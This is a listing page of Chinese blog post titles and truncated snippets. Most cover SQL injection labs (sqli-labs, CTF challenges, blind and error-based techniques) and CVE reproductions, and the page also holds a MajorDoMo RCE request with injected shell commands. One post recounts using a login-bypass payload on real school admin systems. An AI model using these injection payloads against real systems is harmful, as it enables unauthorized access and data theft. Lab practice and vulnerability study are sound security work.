+
  • 2024-07-01sql-labs通关笔记(上)
    sql-labs通关笔记(上)这里我们先只讲解less-1到less-9联合查询注入Less-1:GET-Errorbased.Singlequotes-string界面在url中加入?id=1?id=-1判断注入点使用’或\来判断是否存在注入点payloadhttp://127.0.0.1/sqli/Less-1/?id=-1'报错信息near''-1''LIMIT0
  • 2024-06-23【漏洞复现】WordPress MasterStudy LMS插件 SQL注入漏洞(CVE-2024-1512)
    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPressplugin是一个应用插件。0x02漏洞概述WordPressPluginMasterStudyLMS3.2.5版本
  • 2024-06-21【漏洞挖掘】——102、Blind注入类型深入刨析(上)
    基本介绍BlindInjection(即盲注),当SQL语句执行成功或失败不会给出明确的回显信息或者只有一个提示类的信息,类似于true\false时,此时可以考虑盲注,常见的盲注有以下几种:基于布尔的盲注基于时间的盲注布尔盲注适用场景适用于对于sql语句执行成功或失败各有一个提示结果,例
  • 2024-06-21【漏洞挖掘】——103、Blind注入类型深入刨析(中)
    时间盲注使用场景没有True/False,也没有任何错误提示类信息,在这种情况下可以考虑通过时间线的长短来判断是否存在SQL注入,即基于时间的盲注!函数简介sleep():用于延迟IF(Condition,A,B):当Condition为TRUE时,返回A;当Condition为FALSE时,返回BBENCHMARK(count,expr):重复count
  • 2024-06-09sqli-labs 靶场 less-1、2、3、4 第一关至第四关: 判断闭合方式,order by判断字段数,是否为字符型注入,获取information_schema的表
    SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。Less1SQLIDUMBSERIES-11.判断闭合方式:在参数后面加\的方法判断闭合,\后面的符号就是闭合符号。在第一关,闭合方式通
  • 2024-06-08Linux 中date命令
     date主要用于显示日期,若是不以加号作为开头,则表示要设定时间,而时间格式为MMDDhhmm[[CC]YY][.ss],其中MM为月份,DD为日,hh为小时,mm为分钟,CC为年份前两位数字,YY为年份后两位数字,ss为秒数。001、最基本的用法[root@PC1test2]#date##输出日期SatJun812:
  • 2024-05-31PTE笔记:SQL注入-报错注入
    适用于界面不回显的场景,通过注入语句在报错信息中回显我们想要的信息常用函数1:floor+rand配合count+groupby函数rand() 生成0-1之间的随机数,默认完全随机,加参数后固定随机(多次执行随机生成的数是固定的)floor()取整groupby()分组count()计数concat(字符串)拼接字符串group_
  • 2024-05-29获取用户名 计算机名 MAC地址
    用批处理命令获取用户名、计算机名、MAC地址。首先新建txt文件夹,将下面命令复制到文件中,保存,修改文件后缀名为bat。echo%username%>>%username%+%computername%.txtecho%computername%>>%username%+%computername%.txtgetmac/v|find/i"Realtek">>%username%
  • 2024-05-28[SWPUCTF 2021 新生赛]easy_sql
    [SWPUCTF2021新生赛]easy_sql最近考试比较多,但是越临近考试越不想复习,复现一道web方向sql注入类型的题目解解闷。可能会问最近为什么没打misc了,主要是有一天不知道在哪看到的文案,说misc不适合作为主攻方向,所以还是想坚持一下初心打打web试一下。前置知识数据库中的字段就是
  • 2024-05-19MajorDoMo-thumb.php未授权RCE漏洞复现
    漏洞描述:thumb.php主要用于MajorDoMo中的缩略图生成,这个文件处理外部输入时未正确验证用户输入,攻击者可以利用该处执行恶意代码Fofa:app="MajordomoSL"POC:GET/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%2
  • 2024-05-10P6610 [Code+#7] 同余方程
    P6610[Code+#7]同余方程首先可以中国剩余定理。至于为什么\(a,b\)在满足同余条件后\(a^2+b^2\)仍然满足,是因为根据中国剩余定理的过程,会得到只有当前方程结果为\(a\)的数加起来,所以不管套什么函数都是对的。然后就是推式子了。\[\begin{aligned}ans&=\sum_{a+b\equiv
  • 2024-05-04linux21-日期时间
    linux21-日期时间date查看系统时间更改/etc/localtime修改时区ntp自动校准时区date查看系统时间date[-d][+格式化字符串]-d,通过给定的字符串显示日期,一般用于日期计算,支持以下时间标记year年month月day天hour小时minute分钟s
  • 2024-04-24web安全-SQL注入(sqli)
    web安全-SQL注入(sqli)第一关基于报错的单引号字符型GET注入查看源码单引号,确认存在注入点:http://127.0.0.1/sqli/Less-1/?id=1'查询字段数:从1尝试到4,3没报错,4报错说明字段数为3http://127.0.0.1/sqli/Less-1/?id=1'orderby1,2,3,4--+因为这里有回显,所以使用union
  • 2024-04-22字符型union注入
    注入目标和思路:拿到库名---拿到表名---拿到列名---拿到用户名和密码用id=1'orderbyx--+来确定表有几列,然后用id=0'unionselectx1,x1,x3--+来确定回显位,然后在更改回显位用database()来拿到数据库名,以下用sqlname表示。注:数据库系统的数据库information_schem
  • 2024-04-15洛谷题单指南-数学基础问题-P4057 [Code+#1] 晨跑
    原题链接:https://www.luogu.com.cn/problem/P4057题意解读:给定三个数,计算其最小公倍数。解题思路:三个数a、b、clcm(a,b,c)=lcm(lcm(a,b),c)100分代码:#include<bits/stdc++.h>usingnamespacestd;typedeflonglongLL;LLa,b,c;LLgcd(LLa,LLb){i
  • 2024-04-02《从0到1:CTFer成长之路》题目-SQL注入-2
    《从0到1:CTFer成长之路》题目SQL注入-2:题目类型:web题目描述:打开靶机,出现下面这种界面:我们访问login.php:我们再访问一下user.php:解题方法:这里我们知道login.php是一个后台管理系统的登陆界面,user.php显示的是一句话,看了一下user.php的源码并没有发现什么有用的信息,根据
  • 2024-04-02mysql基于时间的盲注,使用python爆破库名
    mysql基于时间的盲注使用python代码进行爆破库名importrequestsimporttimes=requests.session()#创建session对象后,才可以调用对应的方法发送请求。url='http://192.168.2.101/sqli-labs-master/Less-9/?id='flag=''i=0whileTrue:i=i+1low
  • 2024-03-30SQL注入
    SQL概念SQL介绍-CSDN博客史上最全SQL基础知识总结(理论+举例)-CSDN博客基础篇:数据库SQL入门教程_sql学习-CSDN博客SQL是用于访问和处理数据库的标准的计算机语言。SQL提供了各种任务的语句,包括:查询数据。在表中插入,更新和删除行。创建,替换,更改和删除对象。控制对数据
  • 2024-03-27SQL-Labs靶场“54-57”关通关教程
    君衍.一、54关基于GET的cookie10单引号注入1、源码分析2、联合查询注入二、55关基于GET的cookie14括号注入1、源码分析2、联合查询注入三、56关基于GET的cookie14变形注入1、源码分析2、联合查询注入四、57关基于GET的cookie14双引号注入1、源码分析2、联合查询注
  • 2024-03-26sql注入学校后台
    有运气成分,遇到两个学校,子域名查询了一下发现有登录平台,然后就直接sql了payload:admin'or1=1--+很离谱,这年头这两学校还能直接被sql进入后台。然后进学校后台后就可以直接查看到各种各样的敏感信息,还有各种权限。这里就不一一截图了。
  • 2024-03-26lesson9基于GET提交的单引号闭合的时间盲注
    lesson9基于GET提交的单引号闭合的时间盲注这一关不管输入什么,页面都是显示Youarein......因此只能使用时间盲注一、手工注入1.判断注入点判断注入类型是否为数字型?id=1and1=1andsleep(5)?id=1and1=2andsleep(5)如果是数字型那么页面会延迟5秒,但是发现页面并
  • 2024-03-24Sqli-labs靶场
    Sqli-labs靶场Less-1: Less-1/?id=1'Less-1/?id=1''由此判断是字符型注入。Less-1/?id=1'orderby3--+Less-1/?id=1'orderby4--+由此判断有3列数据。Less-1/?id=-1'unionselect1,database(),3--+由此得到数据库名为security。Less-1/?id=-1&#
  • 2024-03-19lesson7单引号+双括号布尔盲注或一句话木马+蚁剑
    lesson7单引号+双括号布尔盲注或一句话木马+蚁剑1.验证注入点从下面的注入测试来看,只有两种输出结果如果sql执行了,就会输出“Youarein…Useoutfile…”,反之输入“YouhaveanerrorinyourSQLsyntax”?id=1--+--Youarein....Useoutfile......?id=1'--+--
  • 2024-03-11GaussDB命令行显示设置
     GaussDB命令行显示设置 vi~/gauss_env_fileexportPSQLRC=/home/omm/.gsqlrcvi/home/omm/.gsqlrc\setPROMPT1'%`date+%H:%M:%S`%n@%/>'\timingon效果如下:[omm@gaussdb~]$gsql-Uroot-Wxxxxxxxxxx-dpostgres-p8000-ar\setP
  • 2024-03-05hbase自动化建表脚本
    脚本内容如下#!/bin/bashv_date=`date-d'+1day'+%Y%m%d`delete_date=`date-d'-8day'+%Y%m%d`end_date=`date-d'+3day'+%Y%m%d`while[$v_date!=$end_date]doecho"正在创建hbase表namespace:table_name_${v_date}.....